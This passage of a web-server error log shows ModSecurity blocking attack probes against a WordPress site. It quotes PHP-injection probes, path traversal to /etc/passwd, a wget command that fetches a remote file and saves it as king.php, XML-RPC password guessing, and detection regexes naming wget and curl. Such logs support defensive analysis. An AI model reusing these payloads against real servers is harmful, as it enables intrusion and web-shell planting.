152.89.196.13:38028] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/s_e.php"] [unique_id "YwY57vIbY8NJ_u7QUgsr5QAAAMI"] [Wed Aug 24 16:54:50.202787 2022] [:error] [pid 17705:tid 140231923676928] [client 152.89.196.13:41168] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ev. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:ev: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/cache/index3.php"] [unique_id "YwaeKvIbY8NJ_u7QUgs3tgAAAM0"] [Wed Aug 24 22:14:02.334575 2022] [:error] [pid 17026:tid 140231890106112] [client 152.89.196.13:44258] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ev. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:ev: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/.well-known/acme-challenge/menu_settings.php"] [unique_id "Ywbo-ozz1IDCKucdG0DZMwAAABE"] [Thu Aug 25 02:40:16.943976 2022] [:error] [pid 17705:tid 140231965640448] [client 152.89.196.13:57098] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ev. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:ev: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/cgi-bin/menu_settings.php"] [unique_id "YwcnYPIbY8NJ_u7QUgtVJAAAAMg"] [Thu Aug 25 10:38:11.998107 2022] [:error] [pid 18150:tid 139944311871232] [client 152.89.196.13:41434] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ev. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:ev: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/assets/images/utility.php"] [unique_id "YweXY9Mjb5EkU1dzGCHJEAAAAEs"] [Thu Aug 25 18:39:27.762312 2022] [autoindex:error] [pid 18150:tid 139944395798272] [client 54.207.36.58:36588] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Thu Aug 25 21:04:48.791484 2022] [:error] [pid 18149:tid 139944370620160] [client 152.89.196.13:44040] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:gwjqzseune. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:gwjqzseune: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/cache/accesson1.php"] [unique_id "YwgqQOqY0rWhqcpzycp75AAAAAQ"] [Fri Aug 26 09:23:20.951534 2022] [:error] [pid 16852:tid 140100088329984] [client 152.89.196.13:44136] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:gwjqzseune. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:gwjqzseune: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/accesson1.php"] [unique_id "YwjXWDC-Jv7-jgdWB2d8NgAAAMw"] [Fri Aug 26 10:07:33.168187 2022] [:error] [pid 16183:tid 140100234286848] [client 152.89.196.13:46200] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:uqkvp. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:uqkvp: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/components/com_tags/views/tag/tmpl/framework.php"] [unique_id "YwjhteQvphC6zCcYYdRmvwAAAAM"] [Fri Aug 26 15:22:33.929854 2022] [:error] [pid 16184:tid 140100088329984] [client 76.72.172.166:35542] [client 76.72.172.166] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-100000"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "YwkriQ0EIx28G-KQz0oycQAAAEw"] [Fri Aug 26 15:40:46.478913 2022] [:error] [pid 16852:tid 140100004402944] [client 80.67.52.2:36128] [client 80.67.52.2] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS:sfilecontent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-22.php"] [unique_id "YwkvzjC-Jv7-jgdWB2eDBQAAANY"] [Fri Aug 26 15:52:44.287027 2022] [:error] [pid 16184:tid 140100155471616] [client 51.11.181.171:36502] [client 51.11.181.171] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath=../../../x.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wpcargo/includes/barcode.php"] [unique_id "YwkynA0EIx28G-KQz0oyngAAAEQ"], referer: www.google.com [Fri Aug 26 15:52:48.616868 2022] [:error] [pid 16184:tid 140100242679552] [client 51.11.181.171:36504] [client 51.11.181.171] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:2. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:2: wget https:/pst.klgrth.io/paste/e7yx8/raw -O king.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/x.php"] [unique_id "YwkyoA0EIx28G-KQz0oynwAAAEI"], referer: www.google.com [Fri Aug 26 17:05:01.675323 2022] [:error] [pid 16852:tid 140100234286848] [client 51.11.181.171:38882] [client 51.11.181.171] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".xsd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/vendor/phpunit/phpunit/phpunit.xsd"] [unique_id "YwlDjTC-Jv7-jgdWB2eEWAAAAMM"], referer: www.google.com [Sat Aug 27 01:34:07.156258 2022] [:error] [pid 16852:tid 140100234286848] [client 152.89.196.13:56258] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:34534436. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:34534436: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/asfewfefs.php"] [unique_id "Ywm63zC-Jv7-jgdWB2eP7AAAAMM"] [Sat Aug 27 08:35:10.996488 2022] [autoindex:error] [pid 11620:tid 139937768740608] [client 85.31.46.140:41150] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sat Aug 27 18:33:36.839094 2022] [:error] [pid 11621:tid 139937852667648] [client 51.11.181.171:34246] [client 51.11.181.171] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath=../../../x.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wpcargo/includes/barcode.php"] [unique_id "Ywqp0LO37D01SNESe8NN7AAAAEk"], referer: www.google.com [Sat Aug 27 18:33:39.219004 2022] [:error] [pid 11622:tid 139937827489536] [client 51.11.181.171:34248] [client 51.11.181.171] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:2. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:2: wget https:/pst.klgrth.io/paste/e7yx8/raw -O king.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/x.php"] [unique_id "Ywqp01rRwrC5apSIHVblkwAAAIw"], referer: www.google.com [Sat Aug 27 19:33:04.137437 2022] [:error] [pid 11621:tid 139937877845760] [client 51.11.181.171:36738] [client 51.11.181.171] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".xsd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/vendor/phpunit/phpunit/phpunit.xsd"] [unique_id "Ywq3wLO37D01SNESe8NOoAAAAEY"], referer: www.google.com [Sat Aug 27 23:46:14.515037 2022] [:error] [pid 11620:tid 139937760347904] [client 195.178.120.89:42554] [client 195.178.120.89] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:local-download. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:local-download: ../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-post.php"] [unique_id "YwrzFtRmzJPhB3kB3d57pQAAABQ"], referer: www.google.com [Mon Aug 29 21:50:30.703831 2022] [autoindex:error] [pid 2136:tid 139967162455808] [client 80.76.51.29:41078] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed Aug 31 02:32:55.087940 2022] [:error] [pid 28405:tid 139727692850944] [client 195.178.120.89:35550] [client 195.178.120.89] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:local-download. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:local-download: ../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-post.php"] [unique_id "Yw8Op3r-pyP6FQLT1rIc3QAAAAs"], referer: www.google.com [Wed Aug 31 10:03:02.988523 2022] [:error] [pid 1990:tid 139682595661568] [client 51.255.91.234:47428] [client 51.255.91.234] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS:<?xml version. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value><string>admin</string></value></param><param><value><string>Admin(123) found within ARGS:<?xml version: \\x221.0\\x22?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value><string>admin</string></value></param><param><value><string>Admin(123)</string></value></param></params></methodCall>"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Yw94JvGsyuVUKqA84lcmrgAAAFY"] [Wed Aug 31 11:16:31.940392 2022] [:error] [pid 2466:tid 139682637625088] [client 51.255.91.234:51292] [client 51.255.91.234] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS:<?xml version. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value><string>admin</string></value></param><param><value><string>admin(123) found within ARGS:<?xml version: \\x221.0\\x22?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value><string>admin</string></value></param><param><value><string>admin(123)</string></value></param></params></methodCall>"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Yw-JX6s_6vfpyLID-vMivQAAANE"] [Thu Sep 01 06:31:46.697600 2022] [:error] [pid 9583:tid 140292447512320] [client 195.178.120.89:50440] [client 195.178.120.89] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:local-download. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:local-download: ../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-post.php"] [unique_id "YxCYIrdrdfIAewuJZyAB1QAAAMU"], referer: www.google.com [Thu Sep 01 07:27:14.680285 2022] [:error] [pid 9583:tid 140292380370688] [client 195.178.120.89:51346] [client 195.178.120.89] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:local-download. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:local-download: ../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-post.php"] [unique_id "YxClIrdrdfIAewuJZyACKgAAAM0"], referer: www.google.com [Thu Sep 